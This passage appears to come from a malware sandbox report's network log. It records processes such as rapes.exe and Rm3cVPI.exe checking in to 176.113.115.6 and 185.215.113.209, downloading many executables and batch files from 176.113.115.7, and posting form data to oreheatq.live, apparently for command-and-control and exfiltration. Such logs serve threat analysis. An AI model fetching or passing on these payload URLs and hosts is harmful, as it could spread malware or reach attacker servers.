                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 13:59:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 32
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 13:59:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 32
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 13:59:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 32
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 13:59:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 32
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 13:59:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 32
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 13:59:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 32
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 13:59:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 32
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 13:59:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 32
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 13:59:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 32
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 13:59:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 32
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 14:00:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 32
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 14:00:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 32
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 14:00:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 32
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 14:00:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 32
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 14:00:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 32
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 14:00:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 32
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 14:00:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://176.113.115.6/Ni9kiput/index.php
                    rapes.exe
                    Remote address:
                    176.113.115.6:80
                    Request
                    POST /Ni9kiput/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 176.113.115.6
                    Content-Length: 32
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 14:00:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    GET
                    http://185.215.113.16/test/amnew.exe
                    rapes.exe
                    Remote address:
                    185.215.113.16:80
                    Request
                    GET /test/amnew.exe HTTP/1.1
                    Host: 185.215.113.16
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 13:58:43 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 439296
                    Last-Modified: Thu, 30 Jan 2025 18:34:28 GMT
                    Connection: keep-alive
                    ETag: "679bc634-6b400"
                    Accept-Ranges: bytes
                  • flag-ru
                    POST
                    http://185.215.113.209/Di0Her478/index.php
                    futors.exe
                    Remote address:
                    185.215.113.209:80
                    Request
                    POST /Di0Her478/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.209
                    Content-Length: 4
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 13:58:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.209/Di0Her478/index.php
                    futors.exe
                    Remote address:
                    185.215.113.209:80
                    Request
                    POST /Di0Her478/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.209
                    Content-Length: 156
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 13:58:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.209/Di0Her478/index.php
                    futors.exe
                    Remote address:
                    185.215.113.209:80
                    Request
                    POST /Di0Her478/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.209
                    Content-Length: 32
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 13:59:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.209/Di0Her478/index.php
                    futors.exe
                    Remote address:
                    185.215.113.209:80
                    Request
                    POST /Di0Her478/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.209
                    Content-Length: 32
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sat, 29 Mar 2025 13:59:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    GET
                    http://176.113.115.7/test/exe/random.exe
                    rapes.exe
                    Remote address:
                    176.113.115.7:80
                    Request
                    GET /test/exe/random.exe HTTP/1.1
                    Host: 176.113.115.7
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:58:54 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Last-Modified: Sat, 29 Mar 2025 13:17:59 GMT
                    ETag: "eaa00-6317b041961c2"
                    Accept-Ranges: bytes
                    Content-Length: 961024
                    Content-Type: application/x-msdos-program
                  • flag-ru
                    GET
                    http://176.113.115.7/test/am_no.bat
                    rapes.exe
                    Remote address:
                    176.113.115.7:80
                    Request
                    GET /test/am_no.bat HTTP/1.1
                    Host: 176.113.115.7
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:58:59 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Last-Modified: Mon, 03 Mar 2025 16:26:04 GMT
                    ETag: "7d9-62f729cd13f00"
                    Accept-Ranges: bytes
                    Content-Length: 2009
                    Content-Type: application/x-msdos-program
                  • flag-ru
                    GET
                    http://176.113.115.7/files/7001656225/Rm3cVPI.exe
                    rapes.exe
                    Remote address:
                    176.113.115.7:80
                    Request
                    GET /files/7001656225/Rm3cVPI.exe HTTP/1.1
                    Host: 176.113.115.7
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:03 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Last-Modified: Fri, 28 Mar 2025 09:12:13 GMT
                    ETag: "58800-63163774f5cc4"
                    Accept-Ranges: bytes
                    Content-Length: 362496
                    Content-Type: application/x-msdos-program
                  • flag-ru
                    GET
                    http://176.113.115.7/files/rast333a/random.exe
                    rapes.exe
                    Remote address:
                    176.113.115.7:80
                    Request
                    GET /files/rast333a/random.exe HTTP/1.1
                    Host: 176.113.115.7
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:08 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Last-Modified: Sat, 29 Mar 2025 13:29:13 GMT
                    ETag: "211000-6317b2c4036bc"
                    Accept-Ranges: bytes
                    Content-Length: 2166784
                    Content-Type: application/x-msdos-program
                  • flag-ru
                    GET
                    http://176.113.115.7/files/7033027882/TbV75ZR.exe
                    rapes.exe
                    Remote address:
                    176.113.115.7:80
                    Request
                    GET /files/7033027882/TbV75ZR.exe HTTP/1.1
                    Host: 176.113.115.7
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:15 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Last-Modified: Fri, 28 Mar 2025 17:35:14 GMT
                    ETag: "f7c00-6316a7e364866"
                    Accept-Ranges: bytes
                    Content-Length: 1014784
                    Content-Type: application/x-msdos-program
                  • flag-ru
                    GET
                    http://176.113.115.7/files/6691015685/hYjiwV0.exe
                    rapes.exe
                    Remote address:
                    176.113.115.7:80
                    Request
                    GET /files/6691015685/hYjiwV0.exe HTTP/1.1
                    Host: 176.113.115.7
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:21 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Last-Modified: Sat, 29 Mar 2025 09:42:06 GMT
                    ETag: "9e800-63177ffffe481"
                    Accept-Ranges: bytes
                    Content-Length: 649216
                    Content-Type: application/x-msdos-program
                  • flag-ru
                    GET
                    http://176.113.115.7/files/8104437623/EPTwCQd.exe
                    rapes.exe
                    Remote address:
                    176.113.115.7:80
                    Request
                    GET /files/8104437623/EPTwCQd.exe HTTP/1.1
                    Host: 176.113.115.7
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:26 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Last-Modified: Fri, 28 Mar 2025 10:23:36 GMT
                    ETag: "b2028-63164769fe274"
                    Accept-Ranges: bytes
                    Content-Length: 729128
                    Content-Type: application/x-msdos-program
                  • flag-ru
                    GET
                    http://176.113.115.7/files/5163778194/7IIl2eE.exe
                    rapes.exe
                    Remote address:
                    176.113.115.7:80
                    Request
                    GET /files/5163778194/7IIl2eE.exe HTTP/1.1
                    Host: 176.113.115.7
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:31 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Last-Modified: Wed, 26 Mar 2025 03:27:42 GMT
                    ETag: "1290e9-631366b83351c"
                    Accept-Ranges: bytes
                    Content-Length: 1216745
                    Content-Type: application/x-msdos-program
                  • flag-ru
                    GET
                    http://176.113.115.7/files/1781548144/8BNn7ce.bat
                    rapes.exe
                    Remote address:
                    176.113.115.7:80
                    Request
                    GET /files/1781548144/8BNn7ce.bat HTTP/1.1
                    Host: 176.113.115.7
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:36 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Last-Modified: Sat, 29 Mar 2025 13:29:35 GMT
                    ETag: "15e268-6317b2d8ff687"
                    Accept-Ranges: bytes
                    Content-Length: 1434216
                    Content-Type: application/x-msdos-program
                  • flag-ru
                    GET
                    http://176.113.115.7/files/teamex_support/random.exe
                    rapes.exe
                    Remote address:
                    176.113.115.7:80
                    Request
                    GET /files/teamex_support/random.exe HTTP/1.1
                    Host: 176.113.115.7
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:42 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Last-Modified: Sat, 29 Mar 2025 13:18:21 GMT
                    ETag: "1c9200-6317b05638410"
                    Accept-Ranges: bytes
                    Content-Length: 1872384
                    Content-Type: application/x-msdos-program
                  • flag-ru
                    GET
                    http://176.113.115.7/luma/random.exe
                    rapes.exe
                    Remote address:
                    176.113.115.7:80
                    Request
                    GET /luma/random.exe HTTP/1.1
                    Host: 176.113.115.7
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:49 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Last-Modified: Sat, 29 Mar 2025 13:19:11 GMT
                    ETag: "2d2c00-6317b085d3905"
                    Accept-Ranges: bytes
                    Content-Length: 2960384
                    Content-Type: application/x-msdos-program
                  • flag-ru
                    GET
                    http://176.113.115.7/steam/random.exe
                    rapes.exe
                    Remote address:
                    176.113.115.7:80
                    Request
                    GET /steam/random.exe HTTP/1.1
                    Host: 176.113.115.7
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:57 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Last-Modified: Sat, 29 Mar 2025 13:19:40 GMT
                    ETag: "1c1600-6317b0a13e024"
                    Accept-Ranges: bytes
                    Content-Length: 1840640
                    Content-Type: application/x-msdos-program
                  • flag-ru
                    GET
                    http://176.113.115.7/well/random.exe
                    rapes.exe
                    Remote address:
                    176.113.115.7:80
                    Request
                    GET /well/random.exe HTTP/1.1
                    Host: 176.113.115.7
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:04 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Last-Modified: Sat, 29 Mar 2025 13:18:06 GMT
                    ETag: "ecc00-6317b04857933"
                    Accept-Ranges: bytes
                    Content-Length: 969728
                    Content-Type: application/x-msdos-program
                  • flag-ru
                    GET
                    http://176.113.115.7/off/random.exe
                    rapes.exe
                    Remote address:
                    176.113.115.7:80
                    Request
                    GET /off/random.exe HTTP/1.1
                    Host: 176.113.115.7
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 14:00:09 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Last-Modified: Sat, 29 Mar 2025 13:18:43 GMT
                    ETag: "19fa00-6317b06b97d92"
                    Accept-Ranges: bytes
                    Content-Length: 1702400
                    Content-Type: application/x-msdos-program
                  • flag-ru
                    GET
                    http://176.113.115.7/files/martin2/random.exe
                    futors.exe
                    Remote address:
                    176.113.115.7:80
                    Request
                    GET /files/martin2/random.exe HTTP/1.1
                    Host: 176.113.115.7
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:58:56 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Last-Modified: Sat, 29 Mar 2025 13:23:31 GMT
                    ETag: "45f600-6317b17e23e90"
                    Accept-Ranges: bytes
                    Content-Length: 4584960
                    Content-Type: application/x-msdos-program
                  • flag-ru
                    GET
                    http://176.113.115.7/files/unique2/random.exe
                    futors.exe
                    Remote address:
                    176.113.115.7:80
                    Request
                    GET /files/unique2/random.exe HTTP/1.1
                    Host: 176.113.115.7
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:09 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Last-Modified: Sat, 29 Mar 2025 12:59:10 GMT
                    ETag: "469a00-6317ac0c65d53"
                    Accept-Ranges: bytes
                    Content-Length: 4626944
                    Content-Type: application/x-msdos-program
                  • flag-ru
                    GET
                    http://176.113.115.7/mine/random.exe
                    powershell.exe
                    Remote address:
                    176.113.115.7:80
                    Request
                    GET /mine/random.exe HTTP/1.1
                    Host: 176.113.115.7
                    Connection: Keep-Alive
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:58:57 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Last-Modified: Sat, 29 Mar 2025 13:18:14 GMT
                    ETag: "1c6400-6317b04fd38f9"
                    Accept-Ranges: bytes
                    Content-Length: 1860608
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: application/x-msdos-program
                  • flag-ru
                    GET
                    http://176.113.115.7/mine/random.exe
                    powershell.exe
                    Remote address:
                    176.113.115.7:80
                    Request
                    GET /mine/random.exe HTTP/1.1
                    Host: 176.113.115.7
                    Connection: Keep-Alive
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:03 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Last-Modified: Sat, 29 Mar 2025 13:18:14 GMT
                    ETag: "1c6400-6317b04fd38f9"
                    Accept-Ranges: bytes
                    Content-Length: 1860608
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: application/x-msdos-program
                  • flag-us
                    DNS
                    galarona.bet
                    Rm3cVPI.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    galarona.bet
                    IN A
                    Response
                  • flag-us
                    DNS
                    oreheatq.live
                    5cf0a9b56c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    oreheatq.live
                    IN A
                    Response
                    oreheatq.live
                    IN A
                    172.67.172.183
                    oreheatq.live
                    IN A
                    104.21.30.96
                  • flag-us
                    POST
                    https://oreheatq.live/gsopp
                    Rm3cVPI.exe
                    Remote address:
                    172.67.172.183:443
                    Request
                    POST /gsopp HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                    Content-Length: 59
                    Host: oreheatq.live
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Vary: Accept-Encoding
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iuyfpiMxYzr43RK5qwl3NivrP8Q1lifMf9OQwaINsy8fT8y%2FLPwRJpIhyHrCxTBlSqOZc53lo%2FFFQkCVkCRjogzzJctx%2BfN4F%2BrQmnkhrqsa6Eh9bQlEMZvHqUuOH%2B3x"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 927fe2d67fd5fd92-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=48968&min_rtt=43728&rtt_var=18914&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=629&delivery_rate=80403&cwnd=253&unsent_bytes=0&cid=ddbf2f7cc9e1b5f3&ts=267&x=0"
                  • flag-us
                    POST
                    https://oreheatq.live/gsopp
                    Rm3cVPI.exe
                    Remote address:
                    172.67.172.183:443
                    Request
                    POST /gsopp HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=UjWhC4blS6bbUOpS3r
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                    Content-Length: 1517
                    Host: oreheatq.live
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Vary: Accept-Encoding
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aSotAzlAQM%2FEX7FDz89FiVE7uzJhsu4n7TNn21A2MD2ewPMzKhb1XBcBs0LsIn2QnElc7EkZ2Kml%2FTXU84sedwsX55J1l%2FOsSrogKZdIY%2BTZuT3TJiPHeVvy5WyXJ0u7"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 927fe2d80b58fd92-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=48677&min_rtt=43728&rtt_var=14767&sent=10&recv=11&lost=0&retrans=0&sent_bytes=3803&recv_bytes=2495&delivery_rate=80403&cwnd=255&unsent_bytes=0&cid=ddbf2f7cc9e1b5f3&ts=472&x=0"
                  • flag-us
                    POST
                    https://oreheatq.live/gsopp
                    Rm3cVPI.exe
                    Remote address:
                    172.67.172.183:443
                    Request
                    POST /gsopp HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=GE37A87h
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                    Content-Length: 1048
                    Host: oreheatq.live
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Vary: Accept-Encoding
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kx54RZIHPWp6WTW4Kwv5VXG1FqW8SBrGOFzpoGUXeBmmi%2B01vVe%2BW3lddF6pl7W2zOg3GI%2F5ENtIlVPGwf0DhTINAGHmaYDs3QSGnE2599mORnXvLFt6qgur7h%2FlSKji"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 927fe2dafaef9545-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=47075&min_rtt=44794&rtt_var=11103&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1637&delivery_rate=80417&cwnd=253&unsent_bytes=0&cid=1f8a2bc8cdc8dc64&ts=216&x=0"
                  • flag-nl
                    GET
                    http://185.156.73.98/success?substr=mixfour&s=three&sub=none
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /success?substr=mixfour&s=three&sub=none HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:15 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://185.156.73.98/info
                    svchost015.exe
                    Remote address:
                    185.156.73.98:80
                    Request
                    GET /info HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.73.98
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Sat, 29 Mar 2025 13:59:26 GMT
